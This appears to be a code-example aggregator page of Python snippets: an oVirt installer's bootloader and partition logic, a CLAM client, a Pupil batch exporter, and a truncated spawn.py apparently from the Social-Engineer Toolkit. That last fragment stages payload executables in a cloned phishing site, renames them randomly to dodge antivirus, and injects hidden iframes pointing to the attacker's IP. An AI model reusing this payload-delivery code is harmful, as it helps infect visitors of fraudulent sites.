            elif os.path.ismount("/run/initramfs/live"):
                grub_config_file = "/run/initramfs/live/grub/grub.conf"
            if _functions.is_upgrade() and not _functions.is_iscsi_install():
                _functions.mount_liveos()
                grub_config_file = "/liveos/grub/grub.conf"
        if _functions.is_iscsi_install() or _functions.findfs("Boot") \
            and not _functions.is_efi_boot():
            grub_config_file = "/boot/grub/grub.conf"
        if _functions.is_efi_boot():
            logger.debug(str(os.listdir("/liveos")))
            _functions.system("umount /liveos")
            _functions.mount_efi(target="/liveos")
            if self.efi_name == "fedora":
                grub_config_file = "/liveos/EFI/fedora/grub.cfg"
            else:
                grub_config_file = "/liveos/%s/grub.conf" % self.efi_path
        grub_config_file_exists = grub_config_file is not None \
            and os.path.exists(grub_config_file)
        logger.debug("Grub config file is: %s" % grub_config_file)
        logger.debug("Grub config file exists: %s" % grub_config_file_exists)
        if grub_config_file_exists:
            f=open(grub_config_file)
            oldgrub=f.read()
            f.close()
            if _functions.grub2_available():
                m=re.search("^menuentry (.*)$", oldgrub, re.MULTILINE)
            else:
                m=re.search("^title (.*)$", oldgrub, re.MULTILINE)
            if m is not None:
                self.oldtitle=m.group(1)
                # strip off extra title characters
                if _functions.grub2_available():
                    self.oldtitle = self.oldtitle.replace('"','').strip(" {")
        _functions.system("umount /liveos/efi")
        _functions.system("umount /liveos")
        if _functions.is_iscsi_install() or _functions.findfs("Boot"):
            self.boot_candidate = None
            boot_candidate_names = ["BootBackup", "BootUpdate", "BootNew"]
            for trial in range(1, 3):
                time.sleep(1)
                for candidate_name in boot_candidate_names:
                    logger.debug(os.listdir("/dev/disk/by-label"))
                    if _functions.findfs(candidate_name):
                        self.boot_candidate = candidate_name
                        break
                logger.debug("Trial %s to find candidate (%s)" % \
                             (trial, candidate_name))
                if self.boot_candidate:
                    logger.debug("Found candidate: %s" % self.boot_candidate)
                    break

            if not self.boot_candidate:
                logger.error("Unable to find boot partition")
                label_debug = ''
                for label in os.listdir("/dev/disk/by-label"):
                    label_debug += "%s\n" % label
                label_debug += _functions.subprocess_closefds("blkid", \
                                          shell=True, stdout=subprocess.PIPE,
                                          stderr=subprocess.STDOUT).stdout.read()
                logger.debug(label_debug)
                return False
            else:
                boot_candidate_dev = _functions.findfs(self.boot_candidate)
            # prepare Root partition update
            if self.boot_candidate != "BootNew":
                e2label_cmd = "e2label \"%s\" BootNew" % boot_candidate_dev
                logger.debug(e2label_cmd)
                if not _functions.system(e2label_cmd):
                    logger.error("Failed to label new Boot partition")
                    return False
            _functions.system("umount /boot")
            _functions.system("mount %s /boot &>/dev/null" \
                              % boot_candidate_dev)

        candidate = None
        candidate_dev = None
        candidate_names = ["RootBackup", "RootUpdate", "RootNew"]
        for trial in range(1, 3):
            time.sleep(1)
            for candidate_name in candidate_names:
                candidate_dev = _functions.findfs(candidate_name)
                logger.debug("Finding %s: '%s'" % (candidate_name, candidate_dev))
                if candidate_dev:
                    candidate = candidate_name
                    logger.debug("Found: %s" % candidate)
                    break
            logger.debug("Trial %s to find candidate (%s)" % (trial,
                                                              candidate_name))
            if candidate:
                logger.debug("Found candidate: '%s'" % candidate)
                break

        if not candidate:
            logger.error("Unable to find root partition")
            label_debug = ''
            for label in os.listdir("/dev/disk/by-label"):
                label_debug += "%s\n" % label
            label_debug += _functions.subprocess_closefds("blkid", shell=True,
                                      stdout=subprocess.PIPE,
                                      stderr=subprocess.STDOUT).stdout.read()
            logger.debug(label_debug)
            return False

        try:
            self.disk = candidate_dev
            logger.info("Candidate device: %s" % candidate_dev)
            logger.info("Candidate disk: %s" % self.disk)
            # grub2 starts at part 1
            self.partN = int(self.disk[-1:])
            if not _functions.grub2_available():
                self.partN = self.partN - 1
        except:
            logger.debug("Failed to get partition", exc_info=True)
            return False

        if self.disk is None or self.partN < 0:
            logger.error("Failed to determine Root partition number")
            return False
        # prepare Root partition update
        if candidate != "RootNew":
            e2label_cmd = "e2label \"%s\" RootNew" % candidate_dev
            logger.debug(e2label_cmd)
            if not _functions.system(e2label_cmd):
                logger.error("Failed to label new Root partition")
                return False
        mount_cmd = "mount \"%s\" /liveos" % candidate_dev
        if not _functions.system(mount_cmd):
            logger.error("Failed to mount %s on /liveos" % candidate_dev)
            _functions.system("lsof")
            _functions.system("dmsetup info -c")
            _functions.system("cat /proc/mounts")
            _functions.system("multipath -ll")
            _functions.system("lsblk")
            _functions.system("ls -l /dev/mapper")
        _functions.system("rm -rf /liveos/LiveOS")
        _functions.system("mkdir -p /liveos/LiveOS")
        _functions.mount_live()

        if os.path.isdir(self.grub_dir):
            shutil.rmtree(self.grub_dir)
        if not os.path.exists(self.grub_dir):
            os.makedirs(self.grub_dir)
            if _functions.is_efi_boot():
                logger.info("efi detected, installing efi configuration")
                _functions.system("mkdir /liveos/efi")
                _functions.mount_efi()
                _functions.system("mkdir -p /liveos/efi/%s" % self.efi_path)
                if _functions.is_iscsi_install() or _functions.is_efi_boot():
                    if os.path.isfile("/tmp/grubx64.efi"):
                        shutil.copy("/tmp/grubx64.efi",
                                    "/liveos/efi/%s/grubx64.efi" %
                                    self.efi_path)
                    else:
                        shutil.copy("/tmp/grub.efi",
                                    "/liveos/efi/%s/grub.efi" % self.efi_path)
                elif os.path.isfile("/boot/efi/%s/grubx64.efi" %
                        self.efi_path):
                    shutil.copy("/boot/efi/%s/grubx64.efi" % self.efi_path,
                          "/liveos/efi/%s/grubx64.efi" % self.efi_path)
                else:
                    shutil.copy("/boot/efi/%s/grub.efi" % self.efi_path,
                          "/liveos/efi/%s/grub.efi" % self.efi_path)
                if _functions.is_iscsi_install() or _functions.findfs("BootNew"):
                    self.disk = _functions.findfs("BootNew")
                if not "/dev/mapper/" in self.disk:
                    efi_disk = self.disk[:-1]
                else:
                    efi_disk = re.sub(r'p?[1,2,3]$', "", self.disk)
                # generate grub legacy config for efi partition
                #remove existing efi entries
                _functions.remove_efi_entry(_functions.PRODUCT_SHORT)
                if self.efi_name == "fedora":
                    _functions.add_efi_entry(_functions.PRODUCT_SHORT,
                                             ("\\EFI\\%s\\grubx64.efi" %
                                              self.efi_name),
                                             efi_disk)
                else:
                    if os.path.isfile("/liveos/efi/%s/grubx64.efi" %
                            self.efi_path):
                        _functions.add_efi_entry(_functions.PRODUCT_SHORT,
                                                 ("\\EFI\\%s\\grubx64.efi" %
                                                  self.efi_name),
                                                 efi_disk)
                    else:
                        _functions.add_efi_entry(_functions.PRODUCT_SHORT,
                                                 ("\\EFI\\%s\\grub.efi" %
                                                  self.efi_name),
                                                 efi_disk)
        self.kernel_image_copy()

        # reorder tty0 to allow both serial and phys console after installation
        if _functions.is_iscsi_install() or _functions.findfs("BootNew"):
            self.root_param = "root=live:LABEL=Root"
            if "OVIRT_NETWORK_LAYOUT" in OVIRT_VARS and \
                OVIRT_VARS["OVIRT_NETWORK_LAYOUT"] == "bridged":
                network_conf = "ip=br%s:dhcp bridge=br%s:%s" % \
                                (OVIRT_VARS["OVIRT_BOOTIF"],
                                 OVIRT_VARS["OVIRT_BOOTIF"],
                                 OVIRT_VARS["OVIRT_BOOTIF"])
            else:
                network_conf = "ip=%s:dhcp" % OVIRT_VARS["OVIRT_BOOTIF"]
            self.bootparams = "netroot=iscsi:%s::%s::%s %s " % (
                OVIRT_VARS["OVIRT_ISCSI_TARGET_HOST"],
                OVIRT_VARS["OVIRT_ISCSI_TARGET_PORT"],
                OVIRT_VARS["OVIRT_ISCSI_TARGET_NAME"],
                network_conf)
            if "OVIRT_ISCSI_NAME" in OVIRT_VARS:
                self.bootparams+= "iscsi_initiator=%s " % \
                    OVIRT_VARS["OVIRT_ISCSI_NAME"]
        else:
            self.root_param = "root=live:LABEL=Root"
            self.bootparams = "ro rootfstype=auto rootflags=ro "
        self.bootparams += OVIRT_VARS["OVIRT_BOOTPARAMS"].replace(
                                                            "console=tty0", ""
                                                            ).replace(
                                                            "rd_NO_MULTIPATH",
                                                            "")

        if " " in self.disk:
            # workaround for grub setup failing with spaces in dev.name:
            # use first active sd* device
            self.disk = re.sub("p[1,2,3]$", "", self.disk)
            grub_disk_cmd = ("multipath -l " +
                             "\"" + self.disk + "\" " +
                             "| egrep -o '[0-9]+:.*' " +
                             "| awk '/ active / {print $2}' " +
                             "| head -n1")
            logger.debug(grub_disk_cmd)
            grub_disk = _functions.subprocess_closefds(grub_disk_cmd,
                                            shell=True,
                                            stdout=subprocess.PIPE,
                                            stderr=subprocess.STDOUT)
            grub_disk_output, grub_disk_err = grub_disk.communicate()
            self.disk = grub_disk_output.strip()
            if "cciss" in self.disk:
                self.disk = self.disk.replace("!", "/")
            # flush to sync DM and blockdev, workaround from rhbz#623846#c14
            sysfs = open("/proc/sys/vm/drop_caches", "w")
            sysfs.write("3")
            sysfs.close()
        if not self.disk.startswith("/dev/"):
            self.disk = "/dev/" + self.disk
        try:
            if stat.S_ISBLK(os.stat(self.disk).st_mode):
                try:
                    if stat.S_ISBLK(os.stat(self.disk[:-1]).st_mode):
                        # e.g. /dev/sda2
                        self.disk = self.disk[:-1]
                except OSError:
                    pass
                try:
                    if stat.S_ISBLK(os.stat(self.disk[:-2]).st_mode):
                        # e.g. /dev/mapper/WWIDp2
                        self.disk = self.disk[:-2]
                except OSError:
                    pass
        except OSError:
            logger.error("Unable to determine disk for grub installation " +
                         traceback.format_exc())
            return False

        self.grub_dict = {
            "product": _functions.PRODUCT_SHORT,
            "version": _functions.PRODUCT_VERSION,
            "release": _functions.PRODUCT_RELEASE,
            "partN": self.partN,
            "root_param": self.root_param,
            "bootparams": self.bootparams,
            "disk": self.disk,
            "grub_dir": self.grub_dir,
            "grub_prefix": self.grub_prefix,
            "efi_hd": self.efi_hd,
            "linux": "linux",
            "initrd": "initrd",
        }
        if not _functions.is_firstboot():
            if os.path.ismount("/live"):
                with open("%s/version" % self.live_path) as version:
                    for line in version.readlines():
                        if "VERSION" in line:
                            key, value = line.split("=")
                            self.grub_dict["version"] = value.strip()
                        if "RELEASE" in line:
                            key, value = line.split("=")
                            self.grub_dict["release"] = value.strip()

        if _functions.grub2_available():
            if not self.grub2_install():
                logger.error("Grub2 Installation Failed ")
                return False
            else:
                logger.info("Grub2 EFI Installation Completed")
        else:
            if not self.grub_install():
                logger.error("Grub Installation Failed ")
                return False
            else:
                logger.info("Grub Installation Completed")

        if _functions.is_iscsi_install() or _functions.findfs("BootNew"):
            # copy default for when Root/HostVG is inaccessible(iscsi upgrade)
            shutil.copy(_functions.OVIRT_DEFAULTS, "/boot")
            # mark new Boot ready to go, reboot() in ovirt-function switches it
            # to active
            e2label_cmd = "e2label \"%s\" BootUpdate" % boot_candidate_dev

            if not _functions.system(e2label_cmd):
                logger.error("Unable to relabel " + boot_candidate_dev +
                             " to BootUpdate ")
                return False
        else:
            _functions.system("umount /liveos/efi")
        _functions.system("umount /liveos")
        # mark new Root ready to go, reboot() in ovirt-function switches it
        # to active
        e2label_cmd = "e2label \"%s\" RootUpdate" % candidate_dev
        if not _functions.system(e2label_cmd):
            logger.error("Unable to relabel " + candidate_dev +
                         " to RootUpdate ")
            return False
        _functions.system("udevadm settle --timeout=10")

        #
        # Rebuild the initramfs
        # A few hacks are needed to prep the chroot
        # The general issue is that we need to run dracut in the context of the new iso
        # and that we need to put the initrd in the right place of the new iso.
        # These two things make the logic a bit more complicated.
        #
        mnts = []
        try:
            if not _functions.system("blkid -L RootUpdate"):
                raise RuntimeError("RootUpdate not found")

            # Let's mount the update fs, and use that kernel version and modules
            # We need this work to help dracut
            isomnt = tempfile.mkdtemp("RootUpdate")
            squashmnt = tempfile.mkdtemp("RootUpdate-LiveOS")
            updfs = tempfile.mkdtemp("RootUpdate-LiveOS-Img")
            mnts += [isomnt, squashmnt, updfs]

            # Unpack the iso
            def _call(args):
                logger.debug("Calling: %s" % args)
                try:
                    out = subprocess.check_output(args)
                    logger.debug("Out: %s" % out)
                except Exception as e:
                    logger.debug("Failed with: %s %s" % (e, e.output))
                    raise

            _call(["mount", "LABEL=RootUpdate", isomnt])
            _call(["mount", "%s/LiveOS/squashfs.img" % isomnt, squashmnt])
            _call(["mount", "%s/LiveOS/ext3fs.img" % squashmnt, updfs])

            # Now mount the update modules into place, and find the
            # correct kver
            def rbind(path, updfs=updfs):
                dst = updfs + "/" + path
                logger.debug("Binding %r to %r" % (path, dst))
                _call(["mount", "--make-rshared", "--rbind", "/" + path, dst])
                return dst

            for path in ["etc", "dev", "proc", "sys", "tmp", "run", "var/tmp"]:
                mnts += [rbind(path)]

            upd_kver = str(_functions.passthrough("ls -1 %s/lib/modules" % updfs)).strip()

            if len(upd_kver.splitlines()) != 1:
                # It would be very unusual to see more than one kver directory
                # in /lib/modules but might happen when using edit-node.
                # Check via check_higher_kernel() the higher version available
                upd_kver = self.check_higher_kernel(updfs)
                if upd_kver is None:
                    raise RuntimeError("Unable to find the kernel version")

            # Update initramfs to pickup multipath wwids
            # Let /boot point to the filesystem on the update candidate partition
            builder = _system.Initramfs(dracut_chroot=updfs, boot_source=isomnt)
            builder.rebuild(kver=upd_kver)

        except Exception as e:
            logger.debug("Failed to build initramfs: %s" % e, exc_info=True)
            output = getattr(e, "output", "")
            if output:
                logger.debug("Output: %s" % output)
            raise


        finally:
            # Clean up any remaining mounts
            pass
            # Disabled for now because awkward things happen; we leave it to
            # systemd to unmount on reboot
            # for mnt in reversed(mnts):
            #     d = _functions.passthrough("umount -fl %s" % mnt, logger.debug)
            #     logger.debug("Returned: %s" % d)

        _functions.disable_firstboot()
        if _functions.finish_install():
            if _functions.is_firstboot():
                _iscsi.iscsi_auto()
            logger.info("Installation of %s Completed" % \
                                                      _functions.PRODUCT_SHORT)
            if reboot is not None and reboot == "Y":
                _system.async_reboot()
            return True
        else:
            return False
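
A recurring os.path.isfile pattern in this example is the bootloader fallback: copy grubx64.efi when it exists, otherwise fall back to grub.efi. The same idea in a standalone sketch (the candidate paths below are illustrative, not the project's actual layout):

import os
import shutil

def copy_first_existing(candidates, dest_dir):
    # Copy the first candidate that is an existing regular file and
    # report which one won; mirrors the grubx64.efi -> grub.efi fallback.
    for path in candidates:
        if os.path.isfile(path):
            shutil.copy(path, dest_dir)
            return path
    return None

# Hypothetical usage:
# copy_first_existing(["/boot/efi/EFI/fedora/grubx64.efi",
#                      "/boot/efi/EFI/fedora/grub.efi"], "/tmp")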

Example 34

Project: clam
Source File: clamclient.py
View license
def main():
    username = password = None
    parameters = {}
    begin = 0
    rawargs = sys.argv[1:]
    for i,o in enumerate(rawargs):
        if o == '-u':
            username = rawargs[i+1]
            begin = i+2
        elif o == '-p':
            password = rawargs[i+1]
            begin = i+2
        elif o == '-h':
            usage()
            sys.exit(0)
        elif o == '-v':
            print("CLAM Client version " + str(VERSION),file=sys.stderr)
            sys.exit(0)
        elif o[0] == '-' and len(o) > 1 and o[1] != '-':
            usage()
            print("ERROR: Unknown option: ", o,file=sys.stderr)
            sys.exit(2)
        elif o[:2] == '--':
            if len(rawargs) > i + 1:
                parameters[o[2:]] = rawargs[i+1]
                begin = i+2
            else:
                parameters[o[2:]] = True
                begin = i+1

    if len(rawargs) > begin:
        url = rawargs[begin]
    else:
        print("ERROR: URL expected",file=sys.stderr)
        usage()
        sys.exit(2)
    if url[:4] != 'http':
        print("ERROR: URL expected",file=sys.stderr)
        usage()
        sys.exit(2)

    client = CLAMClient(url, username,password)

    if len(rawargs) > begin + 1:
        command = rawargs[begin+1]
        args = rawargs[begin+2:]
    else:
        command = 'info'
        args = []

    if command == 'info' and len(args) > 1:
        command = 'get'


    try:
        data = None
        if command in ['info','index','projects','inputtemplates','parameters','profiles']:
            data = client.index()
        elif command in ['get','input','output','status','inputtemplate']:
            if len(args) != 1:
                print("Expected project ID",file=sys.stderr)
                sys.exit(2)
            data = client.get(args[0])
        elif command == 'create':
            if len(args) != 1:
                print("Expected project ID",file=sys.stderr)
                sys.exit(2)
            client.create(args[0])
        elif command == 'delete' or command == 'abort':
            if len(args) != 1:
                print("Expected project ID",file=sys.stderr)
                sys.exit(2)
            client.delete(args[0])
        #elif command == 'reset':
        #    if len(args) != 1:
        #        print("Expected project ID"
        #        sys.exit(2)
        #    client.reset(args[0])
        elif command == 'start':
            if len(args) < 1:
                print("Expected project ID",file=sys.stderr)
                sys.exit(2)
            client.start(args[0])
        elif command == 'xml':
            if len(args) == 1:
                data = client.get(args[0])
            else:
                data = client.index()
        elif command == 'upload':
            if len(args) < 3:
                print("Expected: project inputtemplate file ",file=sys.stderr)
                sys.exit(2)
            project = args[0]
            data = client.get(project)
            try:
                inputtemplate = data.inputtemplate(args[1])
            except:
                print("No such input template: " + args[1],file=sys.stderr)
                sys.exit(2)
            filepath = args[2]
            if not os.path.isfile(filepath):
                print("File does not exist: " + filepath,file=sys.stderr)
                sys.exit(2)
            client.upload(project,inputtemplate, filepath, **parameters)
        elif command == 'download':
            if len(args) < 2:
                print("Expected: project file ",file=sys.stderr)
                sys.exit(2)

            project = args[0]
            filepath = args[1]
            if len(args) == 3:
                targetfile = args[2]
            else:
                targetfile = os.path.basename(filepath)
            client.download(project, filepath, targetfile)
        else:
            print("Unknown command: " + command,file=sys.stderr)
            sys.exit(1)


        if data:
            if command == 'xml':
                print(data.xml)
            if command in ['info','get']:
                print("General Information")
                print("\tSystem ID:   " + data.system_id)
                print("\tSystem Name: " + data.system_name)
                print("\tSystem URL:  " + data.baseurl)
                if username:
                    print("\tUser:        " + username)
                if command == 'get':
                    print("\tProject:     " + data.project)
            if command in ['info','projects','index']:
                print("Projects")
                for project in data.projects:
                    print("\t" + project)
            if command in ['get','status']:
                print("Status Information")
                print("\tStatus: " + str(data.status)) #TODO: nicer messages
                print("\tStatus Message: " + data.statusmessage)
                print("\tCompletion: " + str(data.completion) + "%")
            if command in ['info','profiles']:
                print("Profiles:") #TODO: Implement
                for i, profile in enumerate(data.profiles):
                    print("\tProfile " + str(i+1))
                    print("\t Input")
                    for template in profile.input:
                        print("\t\t" + template.id + " - " + template.label)
                    print("\t Output")
                    for template in profile.output:
                        if isinstance(template, ParameterCondition):
                            for t in template.allpossibilities():
                                print("\t\t(CONDITIONAL!) " + t.id + " - " + t.label)
                        else:
                            print("\t\t" + template.id + " - " + template.label)
            if command == 'inputtemplates':
                print("Input templates:")
                for template in data.input:
                    print("\t\t" + template.id + " - " + template.label)
            if command == 'inputtemplate':
                try:
                    inputtemplate = data.inputtemplate(args[0])
                except:
                    print("No such inputtemplate",file=sys.stderr)
                    sys.exit(1)
                print("Inputtemplate parameters:")
                for parameter in inputtemplate.parameters:
                    print("\t\t" + str(parameter)) #VERIFY: unicode support?
                print("Inputtemplate converters:")
                for c in inputtemplate.converters:
                    print("\t\t" + c.id + " - " + c.label )
            if command in ['info','parameters']:
                print("Global Parameters:")
                for group, parameters in data.parameters:
                    print("\t" + group)
                    for parameter in parameters:
                        print("\t\t" + str(parameter))#VERIFY: unicode support?
            if command in ['get','input'] and data.input:
                print("Input files:")
                for f in data.input:
                    print("\t" + f.filename + "\t" + str(f),end="")
                    if f.metadata and f.metadata.inputtemplate:
                        print("\t" + f.metadata.inputtemplate)
                    else:
                        print()
            if command in ['get','output'] and data.output:
                print("Output files:")
                for f in data.output:
                    print("\t" + f.filename + "\t" + str(f),end="")
                    if f.metadata and f.metadata.provenance and f.metadata.provenance.outputtemplate_id:
                        print("\t" + f.metadata.provenance.outputtemplate_id)
                    else:
                        print()

    except NotFound:
        print("Not Found (404)",file=sys.stderr)
    except PermissionDenied:
        print("Permission Denied (403)",file=sys.stderr)
    except ServerError:
        print("Server Error! (500)",file=sys.stderr)
    except AuthRequired:
        print("Authorization required (401)",file=sys.stderr)

Example 35

Project: pupil
Source File: batch_exporter.py
View license
def main():


    def show_progess(jobs):
        no_jobs = len(jobs)
        width = 80
        full = width/no_jobs
        string = ""
        for j in jobs:
            try:
                p = int(width*j.current_frame.value/float(j.frames_to_export.value*no_jobs) )
            except:
                p = 0
            string += '['+ p*"|"+(full-p)*"-" + "]"
        sys.stdout.write("\r"+string)
        sys.stdout.flush()


    """Batch process recordings to produce visualizations
    Using simple_circle as the default visualization
    Steps:
        - User supplies: a directory that contains many recording dirs or just one recording dir
        - We walk the user-supplied directory to get all data folders
        - Data is the list we feed to our multiprocessed workers
        - Error check -- do we have the required files in each dir?: world.avi, gaze_positions.npy, timestamps.npy
        - Result: world_viz.avi within each original data folder
    """


    parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,
        description=dedent('''\
            ***************************************************
            Batch process recordings to produce visualizations
            The default visualization will use simple_circle

            Usage Example:
                python batch_exporter.py -d /path/to/folder-with-many-recordings -s ~/Pupil_Player/settings/user_settings -e ~/my_export_dir
            Arguments:
                -d : Specify a recording directory.
                     This could have one or many recordings contained within it.
                     We will recurse into the dir.
                -s : Specify path to Pupil Player user_settings file to use last used visualization settings.
                -e : Specify export directory if you don't want the export saved within each recording dir.
                -p : Export a 120 frame preview only.
            ***************************************************\
        '''))
    parser.add_argument('-d', '--rec-dir',required=True)
    parser.add_argument('-s', '--settings-file',required=True)
    parser.add_argument('-e', '--export-to-dir',default=False)
    parser.add_argument('-c', '--basic-color',default='red')
    parser.add_argument('-p', '--preview', action='store_true')

    if len(sys.argv)==1:
        print parser.description
        return

    args = parser.parse_args()
    # get the top level data folder from terminal argument

    data_dir = args.rec_dir

    if args.settings_file and os.path.isfile(args.settings_file):
        session_settings = Persistent_Dict(os.path.splitext(args.settings_file)[0])
        #these are loaded based on user settings
        plugin_initializers = session_settings.get('loaded_plugins',[])
        session_settings.close()
    else:
        logger.error("Settings file not found or not valid")
        return

    if args.export_to_dir:
        export_dir = args.export_to_dir
        if os.path.isdir(export_dir):
            logger.info("Exporting all vids to %s"%export_dir)
        else:
            logger.error("Exporting dir is not valid %s"%export_dir)
            return
    else:
        export_dir = None
        logger.info("Exporting into the recording dirs.")

    if args.preview:
        preview = True
        logger.info("Exporting first 120 frames only")
    else:
        preview = False

    class Temp(object):
        pass

    recording_dirs = get_recording_dirs(data_dir)
    # start multiprocessing engine
    n_cpu = cpu_count()
    logger.info("Using a maximum of %s CPUs to process visualizations in parallel..." %n_cpu)

    jobs = []
    outfiles = set()
    for d in recording_dirs:
        j = Temp()
        logger.info("Adding new export: %s"%d)
        j.should_terminate = Value(c_bool,0)
        j.frames_to_export  = Value(c_int,0)
        j.current_frame = Value(c_int,0)
        j.data_dir = d
        j.user_dir = None
        j.start_frame= None
        if preview:
            j.end_frame = 30
        else:
            j.end_frame = None
        j.plugin_initializers = plugin_initializers[:]

        if export_dir:
            #make a unique name created from rec_session and dir name
            rec_session, rec_dir = d.rsplit(os.path.sep,2)[1:]
            out_name = rec_session+"_"+rec_dir+".mp4"
            j.out_file_path = os.path.join(os.path.expanduser(export_dir),out_name)
            if j.out_file_path in outfiles:
                logger.error("This export setting would try to save %s at least twice; please rename dirs to prevent this."%j.out_file_path)
                return
            outfiles.add(j.out_file_path)
            logger.info("Exporting to: %s"%j.out_file_path)

        else:
            j.out_file_path = None

        j.args = (j.should_terminate,j.frames_to_export,j.current_frame, j.data_dir, j.user_dir,j.start_frame,j.end_frame,j.plugin_initializers,j.out_file_path)
        jobs.append(j)


    todo = jobs[:]
    workers = [Export_Process(target=export,args=todo.pop(0).args) for i in range(min(len(todo),n_cpu))]
    for w in workers:
        w.start()

    working = True

    t = time.time()
    while working: #cannot use pool as it does not allow shared memory
        working = False
        for i in range(len(workers)):
            if workers[i].is_alive():
                working = True
            else:
                if todo:
                    workers[i] = Process(target=export,args=todo.pop(0).args)
                    workers[i].start()
                    working = True
        show_progess(jobs)
        time.sleep(.25)
    print '\n'
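
The -s handling above is the common argparse variant of this check: validate the path with os.path.isfile before anything tries to load it, so a mistyped --settings-file produces one clear error instead of a traceback. A sketch using only the standard library (Persistent_Dict is the project's own class and is left out here):

import argparse
import os

def parse_args(argv):
    parser = argparse.ArgumentParser()
    parser.add_argument('-s', '--settings-file', required=True)
    args = parser.parse_args(argv)
    # parser.error() prints the message and exits with status 2
    if not os.path.isfile(args.settings_file):
        parser.error("settings file not found: %s" % args.settings_file)
    return args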

Example 36

Project: pwn_plug_sources
Source File: spawn.py
View license
def web_server_start():
        # define if use apache or not
        apache=0
        # open set_config here
        apache_check=file("%s/config/set_config" % (definepath),"r").readlines()
        # loop this guy to search for the APACHE_SERVER config variable
        for line in apache_check:
                # strip \r\n
                line=line.rstrip()
                # if apache is turned on get things ready
                match=re.search("APACHE_SERVER=ON",line)
                # if its on lets get apache ready
                if match:
                        for line2 in apache_check:
                                # set the apache path here
                                match2=re.search("APACHE_DIRECTORY=", line2)
                                if match2:
                                        line2=line2.rstrip()
                                        apache_path=line2.replace("APACHE_DIRECTORY=","")
                                        apache=1
                                        if operating_system == "windows": apache = 0

        # GRAB DEFAULT PORT FOR WEB SERVER
        fileopen=file("config/set_config" , "r").readlines()
        counter=0
        for line in fileopen:
                line=line.rstrip()
                match=re.search("WEB_PORT=", line)
                if match:
                        line=line.replace("WEB_PORT=", "")
                        web_port=line
                        counter=1
        if counter == 0: web_port=80

        # see if exploit requires webdav
        if os.path.isfile("src/program_junk/meta_config"):
                fileopen=file("src/program_junk/meta_config", "r")
                for line in fileopen:
                        line=line.rstrip()
                        match=re.search("set SRVPORT 80", line)
                        if match:
                                match2=re.search("set SRVPORT 8080", line)
                                if not match2:
                                        web_port=8080

        # Open the IPADDR file
        fileopen=file("src/program_junk/ipaddr.file","r").readlines()
        for line in fileopen:
            line=line.rstrip()
            ipaddr=line

        # Grab custom or set defined
        if os.path.isfile("src/program_junk/site.template"):
                fileopen=file("src/program_junk/site.template","r").readlines()
                for line in fileopen:
                        line=line.rstrip()
                        match=re.search("TEMPLATE=", line)
                        if match:
                                line=line.split("=")
                                template=line[1]
	
        # grab web attack selection
        if os.path.isfile("src/program_junk/attack_vector"):
                fileopen=file("src/program_junk/attack_vector","r").readlines()
                for line in fileopen:
                        attack_vector=line.rstrip()
        
        # if it doesn't exist just set a default template
        if not os.path.isfile("src/program_junk/attack_vector"):
                attack_vector = "nada"

        # Sticking it to A/V below
        import string,random
        def random_string(minlength=6,maxlength=15):
                  length=random.randint(minlength,maxlength)
                  letters=string.ascii_letters+string.digits
                  return ''.join([random.choice(letters) for _ in range(length)])
        rand_gen=random_string() #+".exe"

        # check multiattack flags here
        multiattack_harv = "off"
        if os.path.isfile("src/program_junk/multi_harvester"):
                multiattack_harv = "on"
        if os.path.isfile("src/program_junk/multi_tabnabbing"):
                multiattack_harv = "on"

        # open our config file that was specified in SET
        if os.path.isfile("src/program_junk/site.template"):
                fileopen=file("src/program_junk/site.template", "r").readlines()
                # start loop here
                for line in fileopen:
                        line=line.rstrip()
                        # look for config file and parse for URL
                        match=re.search("URL=",line)
                        if match:
                                line=line.split("=")
                                # define url to clone here
                                url=line[1].rstrip()
        # if we didn't create template then do self
        if not os.path.isfile("src/program_junk/site.template"):
                template = "SELF"

        # If SET is setting up the website for you, get the website ready for delivery
        if template == "SET":

                # change to that directory
                os.chdir("src/html/")
                # remove stale index.html files
                if os.path.isfile("index.html"):
                        os.remove("index.html")
                # define files and get ipaddress set in index.html
                fileopen=file("index.template", "r").readlines()
                filewrite=file("index.html", "w")
                if attack_vector == "java":
                        for line in fileopen:
                                match1=re.search("msf.exe", line)
                                if match1: line=line.replace("msf.exe", rand_gen)
                                match=re.search("ipaddrhere", line)
                                if match:
                                        line=line.replace("ipaddrhere", ipaddr)
                                filewrite.write(line)
                        # move random generated name
                        filewrite.close()
                        shutil.copyfile("msf.exe", rand_gen)

                # define browser attack vector here
                if attack_vector == "browser":
                        counter=0
                        for line in fileopen:
                                counter=0
                                match=re.search("Signed_Update.jar", line)
                                if match:
                                        line=line.replace("Signed_Update.jar", "invalid.jar")
                                        filewrite.write(line)
                                        counter=1
                                match2=re.search("<head>", line)
                                if match2:
                                        if web_port != 8080:
                                                line=line.replace("<head>", '<head><iframe src ="http://%s:8080/" width="100" height="100" scrolling="no"></iframe>' % (ipaddr))
                                                filewrite.write(line)
                                                counter=1
                                        if web_port == 8080:
                                                line=line.replace("<head>", '<head><iframe src = "http://%s:80/" width="100" height="100" scrolling="no" ></iframe>' % (ipaddr))
                                                filewrite.write(line)
                                                counter=1
                                if counter == 0:
                                        filewrite.write(line)
                filewrite.close()

        if template == "CUSTOM" or template == "SELF":
                # Bring our files to our directory
                if attack_vector != 'hid':
                        if attack_vector != 'hijacking':
                                print "\n" + bcolors.YELLOW + "[*] Moving payload into cloned website." + bcolors.ENDC
                                # copy all the files needed
                                if not os.path.isfile("%s/src/program_junk/Signed_Update.jar" % (definepath)):
                                        shutil.copyfile("%s/src/html/Signed_Update.jar.orig" % (definepath), "%s/src/program_junk/Signed_Update.jar" % (definepath))
                                shutil.copyfile("%s/src/program_junk/Signed_Update.jar" % (definepath), "%s/src/program_junk/web_clone/Signed_Update.jar" % (definepath))
                                if os.path.isfile("%s/src/html/nix.bin" % (definepath)):
                                        shutil.copyfile("%s/src/html/nix.bin" % (definepath), "%s/src/program_junk/web_clone/nix.bin" % (definepath))
                                if os.path.isfile("%s/src/html/mac.bin" % (definepath)):
                                        shutil.copyfile("%s/src/html/mac.bin" % (definepath), "%s/src/program_junk/web_clone/mac.bin" % (definepath))
                                if os.path.isfile("%s/src/html/msf.exe" % (definepath)):
                                        shutil.copyfile("%s/src/html/msf.exe" % (definepath), "%s/src/program_junk/web_clone/msf.exe" % (definepath))
                                # pull random name generation
                                PrintStatus("The site has been moved. SET Web Server is now listening..")
                                if os.path.isfile("%s/src/program_junk/rand_gen" % (definepath)):
                                        fileopen=file("%s/src/program_junk/rand_gen" % (definepath), "r")
                                        for line in fileopen:
                                                rand_gen=line.rstrip()
                                        if os.path.isfile("%s/src/program_junk/custom.exe" % (definepath)):
